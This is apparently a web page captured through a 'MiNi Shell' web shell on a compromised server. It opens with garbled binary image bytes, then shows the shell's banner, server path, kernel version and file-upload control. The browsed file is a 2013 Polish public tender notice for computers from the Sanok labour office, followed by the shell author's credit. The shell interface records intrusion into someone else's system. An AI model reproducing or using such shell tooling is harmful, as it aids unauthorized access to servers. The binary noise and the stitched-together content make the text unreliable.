JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131205/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131205/263647-N-2013.html

<p class="kh_header"><b>Sanok: Dostawa sprzętu komputerowego</b><br>
<b>Numer ogłoszenia: 263647 - 2013; data zamieszczenia: 05.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Sanoku , ul. Rymanowska 20A, 38-500 Sanok, woj. podkarpackie, tel. 0-13 4657000, faks 0-13 4657001.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup.sanok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu komputerowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa fabrycznie nowego sprzętu komputerowego z oprogramowaniem (zakup wraz z dostarczeniem do siedziby Zamawiajacego z rozładunkiem i wniesieniem do pomieszczeń wskazanych przez Zamawiającego) wraz z usługami gwarancyjnymi na potrzeby Powiatowego Urzędu Pracy w Sanoku tj jedenaście zestawów komputerów stacjonarnych składających się z jednostek centralnych i monitorów (wraz z oprogramowaniem i wyposażeniem, w szczególności w mysz komputerową, klawiaturę i niezbędne okablowanie) oraz cztery komputery typu notebook (wraz z oprogramowaniem, dedykowanym wyposażeniem, w tym torba i okablowanie). Dostarczenie towaru do siedziby Zamawiającego, w tym obowiązek odpowiedniego zabezpieczenia towaru czy ubezpieczenia w czasie transportu spoczywa na Wykonawcy. Wykonawca ponosi odpowiedzialność za wszelkie szkody, w tym przypadkową utratę lub uszkodzenie towaru do czasu jego wydania Zamawiającemu w jego siedzibie..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.21.40.00-2, 30.23.13.00-0, 30.21.33.00-8, 30.21.31.00-6, 30.23.70.00-9, 48.00.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje, nie wyznacza szczegółowego warunku w tym zakresie;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje, nie wyznacza szczegółowego warunku w tym zakresie;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje, nie wyznacza szczegółowego warunku w tym zakresie;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje, nie wyznacza szczegółowego warunku w tym zakresie;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje, nie wyznacza szczegółowego warunku w tym zakresie;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">7.1. W celu potwierdzenia, że oferowany przez Wykonawcę sprzęt odpowiada wymaganiom określonym przez Zamawiającego, Zamawiający żąda załączenia do oferty:
7.1.1. Wydruków ze strony internetowej Microsoft , potwierdzających kompatybilność komputera na stronie Windows Logos Products List na dana platformę systemową - dotyczy komputerów stacjonarnych (jednostek centralnych).
7.1.2.Wydruków ze stron internetowych (np. www.eu-energystar.org lub www.energystar.gov), potwierdzających spełnianie przez oferowane urządzenia normy Energy Star 5.0 lub równoważnej - dotyczy komputerów stacjonarnych (jednostek centralnych) oraz monitorów, przy czym dla monitorów TYP I i TYP II potwierdzających spełnianie przez oferowany sprzęt normy Energy Star 5.1. lub równoważnej.
7.1.3. Wydruków ze stron internetowych zawierających stosowne katalogi (np. http://www.epeat.net), potwierdzających posiadanie przez oferowany model komputera certyfikatu EPEAT na poziomie GOLD  - dotyczy komputerów stacjonarnych (jednostek centralnych), monitorów  TYP I i TYP II.
7.1.4.Oświadczenia, iż sprzęt posiada oznakowanie CE i deklarację zgodności rozumianą jako oświadczenie producenta lub jego upoważnionego przedstawiciela, że oferowany sprzęt jest zgodny z zasadniczymi wymaganiami określonymi w rozporządzeniach wydanych na podstawie ustawy z dnia 30 sierpnia 2002 r. o systemie oceny zgodności - dotyczy  komputerów stacjonarnych (jednostek centralnych), monitorów TYP I i TYP II, komputerów typu notebook;
7.1.5. Oświadczenie producenta (wg. Wytycznych Krajowej Agencji Poszanowania Energii S.A. Zawartych w dokumencie - Opracowanie propozycji kryteriów środowiskowych dla produktów zużywających energię możliwych do wykorzystania przy formułowaniu specyfikacji na potrzeby zamówień publicznych, pkt.3.4.2.1., dokument z grudnia 2006 r.) na potwierdzenie spełniania kryteriów środowiskowych w tym zgodności z dyrektywą RoHS Unii Europejskiej o eliminacji substancji niebezpiecznych, w szczególności  zgodności z normą ISO 1043 - 4 dla płyty głównej oraz elementów wykonanych z tworzyw sztucznych o masie powyżej 25 gram - dotyczy komputerów stacjonarnych (jednostek centralnych); 
7.1.6.Zaświadczenie lub inny dokument wydany dla producenta oferowanego sprzętu przez niezależny podmiot zajmujący się poświadczaniem zgodności działań wykonawcy z normami jakościowymi odwołujący się do systemów zapewniania jakości opartych na ISO 9001 lub równoważnego na cały proces produkcji. Wykonawca może zamiast ww. złożyć równoważne zaświadczenia wystawione wystawione przez podmioty mające siedzibę w innym państwie członkowskim Europejskiego Obszaru Gospodarczego lub złożyć inne dokumenty potwierdzające stosowanie przez producenta oferowanego sprzętu równoważnych środków zapewniania jakości - dotyczy komputerów stacjonarnych (jednostek centralnych), monitorów TYP I i TYP II oraz komputerów typu notebook;
7.1.7. Zaświadczenie lub inny dokument wydany dla producenta oferowanego sprzętu przez niezależny podmiot zajmujący się poświadczaniem zgodności działań wykonawcy z normami jakościowymi odwołujący się do systemów zapewniania jakości opartych na 13406-2 lub ISO 9241- dotyczy monitorów TYP I i TYP II 
7.1.8. Certyfikat TCO  -  dotyczy monitorów TYP I i TYP II
7.1.9. Oświadczenie producenta sprzętu, na potwierdzenie, że głośność jednostki centralnej mierzona zgodnie z normą ISO 7779 oraz wykazana zgodnie z normą ISO 9296 w pozycji operatora w trybie pracy dysku twardego (WORK) wynosi maksymalnie 23 dB - dotyczy komputerów stacjonarnych (jednostek centralnych).
7.1.10. Wydruk ze strony internetowej potwierdzający, że procesor osiąga w teście wydajności PassMark PerformanceTest (wynik dostępny: http://www.passmark.com/products/pt.htm) co najmniej:
- wynik 3990 punktów Passmark CPU Mark  dla procesora w zaoferowanych komputerach typu notebook,
- wynik 6500 punktów Passmark CPU Mark dla zaoferowanych procesorów klasy x86, zaprojektowanych do pracy w komputerach stacjonarnych.
7.1.11. Zaświadczenie lub inny dokument wydany dla wskazanej przez wykonawcę firmy serwisującej przez niezależny podmiot zajmujący się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, odwołujący się do systemów zapewniania jakości opartych na normie ISO 9001 lub równoważnego na świadczenie usług serwisowych. Wykonawca może zamiast ww. przedłożyć równoważne zaświadczenia wystawione przez podmioty mające siedzibę w państwie członkowskim Europejskiego Obszaru Gospodarczego lub złożyć inne dokumenty potwierdzające stosowanie przez wskazaną firmę serwisującą równoważnych środków zapewniania jakości - dotyczy komputerów stacjonarnych (jednostek centralnych), monitorów TYP I i TYP II; 
7.1.12. Oświadczenie producenta, że serwis będzie realizowany bezpośrednio przez producenta  lub autoryzowanego partnera serwisowego producenta - dotyczy komputerów stacjonarnych (jednostek centralnych), monitorów TYP I i TYP II oraz komputerów typu notebook; 
7.1.13.  Autoryzacja producenta sprzętu dla wskazanej przez wykonawcę firmy serwisującej  - dotyczy komputerów stacjonarnych (jednostek centralnych), monitorów TYP I i TYP II ;
7.1.14. Oświadczenie producenta sprzętu, że w przypadku nie wywiązywania się z obowiązków gwarancyjnych wykonawcy lub firmy serwisującej przejmie na siebie wszelkie zobowiązania związane z serwisem - dotyczy komputerów stacjonarnych (jednostek centralnych), monitorów TYP I i TYP II;
7.1.15. Oświadczenie podmiotu realizującego serwis lub producenta sprzętu, że w przypadku awarii dysków twardych dysk pozostaje u Zamawiającego - dotyczy komputerów stacjonarnych (jednostek centralnych) oraz komputerów typu notebook.

7.2. W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego, Zamawiający zastrzega sobie prawo do wezwania Wykonawców, po otwarciu ofert i przed wyborem oferty najkorzystniejszej, do dostarczenia egzemplarzy testowych oferowanego sprzętu, w przypadku, gdy poweźmie wątpliwość, czy zaoferowany sprzęt spełnia wymagania określone w niniejszej siwz ,a w szczególności w załączniku nr 5 do siwz (próbka na wezwanie).
UWAGA! niniejsza lista dokumentów obejmuje także doprecyzowanie dokumentów określonych wyżej w niniejszym pkt. III. 5) jako: 
- próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;
- zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;
- zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich;</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli umocowanie do działania w imieniu Wykonawcy w zakresie podpisania umowy nie będzie wynikało z dokumentu rejestracyjnego lub innego dokumentu złożonego wraz z ofertą, Wykonawca zobowiązany będzie do złożenia przed podpisaniem umowy dokumentu (dokumentów), z których wynikać będzie umocowanie do reprezentacji Wykonawcy np.: stosownych pełnomocnictw. Pełnomocnictwo powinno być przedstawione w formie oryginału lub poświadczonej za zgodność             z oryginałem kopii przez notariusza lub osobę/y uprawnioną/e do reprezentacji na podstawie dokumentu rejestracyjnego. W przypadku, gdy ofertę składają Wykonawcy ubiegający się wspólnie o udzielenie zamówienia, wymagane jest załączenie dokumentu pełnomocnictwa określającego zakres umocowania pełnomocnika ustanowionego do reprezentowania ich w postępowaniu, stosownie do art. 23 ust. 2 ustawy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana postanowień niniejszej umowy może nastąpić za obopólną zgodą Stron, wyrażoną na piśmie pod rygorem nieważności w przypadku wystąpienia okoliczności opisanych poniżej:
1) w razie zmiany stawki podatku od towarów i usług, wprowadzonej na podstawie odrębnych przepisów, które wejdą w życie po dniu zawarcia umowy. W takim przypadku wysokość wynagrodzenia należnego Wykonawcy ustalana jest każdorazowo  z uwzględnieniem aktualnej stawki podatku od towarów i usług obowiązującej na dzień wystawienia faktury; 
2) wystąpienia siły wyższej (pod pojęciem siły wyższej rozumie się wszelkie zdarzenia  o charakterze nadzwyczajnym, niemożliwe do przewidzenia i zapobieżenia, a w szczególności: katastrofalne działanie sił przyrody, wojny, mobilizacje, zamknięcie granic, strajki generalne oraz akty władzy publicznej), co uniemożliwia wykonanie przedmiotu umowy zgodnie ze specyfikacją istotnych warunków zamówienia (SIWZ), a w szczególności w oznaczonym terminie (§ 2 pkt. 1 umowy) lub w przewidzianym tam zakresie; 
3) wówczas gdy powierzenie wykonania części zamówienia podwykonawcom nie było przewidziane przez Wykonawcę w ofercie, a taka potrzeba wynikła w trakcie realizacji Umowy, Zamawiający dopuszcza możliwość zlecenia części zamówienia podwykonawcy za zgodą Zamawiającego wyrażoną na piśmie pod rygorem nieważności;
4) wprowadzenie zamiany rzeczy będących przedmiotem niniejszej umowy lub ich komponentów  przedstawionych w Ofercie Wykonawcy pod warunkiem, że zmiany te będą korzystne dla Zamawiającego to jest wpłyną na obniżenie kosztów ponoszonych przez Zamawiającego na eksploatację i konserwację przedmiotu umowy lub poprawią parametry techniczne i efektywność rozwiązania. Zmiany, o których mowa nie mogą powodować podwyższenia wynagrodzenia Wykonawcy ustalonego w § 2 ust.1 umowy.
5) przedłużenie terminu realizacji zamówienia, nawet jeśli opóźnienie byłoby następstwem okoliczności, za które odpowiada Wykonawca, jeśli łącznie zostaną spełnione następujące warunki:
a) Wykonawca powiadomi Zamawiającego najpóźniej na 5 dni przed upływem terminu wykonania umowy lub odpowiednio innych terminów wynikających z Umowy (np. czynności serwisowych), o niemożliwości wykonania w umówionym terminie,
b)  Wykonawca zaproponuje akceptowalny przez Zamawiającego nowy termin wykonania umowy lub czynności serwisowych,
c) Wykonawca zaproponuje Zamawiającemu rekompensatę za przedłużenie terminów, w tym np. poprzez przedłużenie okresu gwarancji.
6)  zamiana na sprzęt nowszy technologiczne, w przypadku jeśli wystąpi niedostępność na rynku sprzętu wskazanego w ofercie spowodowana zaprzestaniem produkcji lub wycofaniem z rynku tego sprzętu,
2. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do obligatoryjnego wyrażenia takiej zgody. Warunkiem dokonania zmian postanowień zawartej umowy jest zgoda obu Stron wyrażona w formie określonej w ust. 1
3. Nie stanowi zmiany umowy, w rozumieniu art. 144 ustawy Prawo zamówień publicznych,w szczególności: zmiana danych związanych z obsługą administracyjno - organizacyjną Umowy, zmiana danych teleadresowych, zmiana osób wskazanych w § 1 ust. 6 umowy,  zmiany pozostałych postanowień umowy nie stanowiące zmiany treści oferty Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www://bip.pup.sanok.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Sanok, ul. Rymanowska 20A , 38 - 500 Sanok, Dział Organizacyjno- Administracyjny, budynek A, pok. nr 15..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.12.2013 godzina 10:00, miejsce: Powiatowy Urząd Pracy w Sanoku ul. Rymanowska 20A, 38 - 500 Sanok, Sekretariat, budynek A, II piętro, pok. nr 14..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com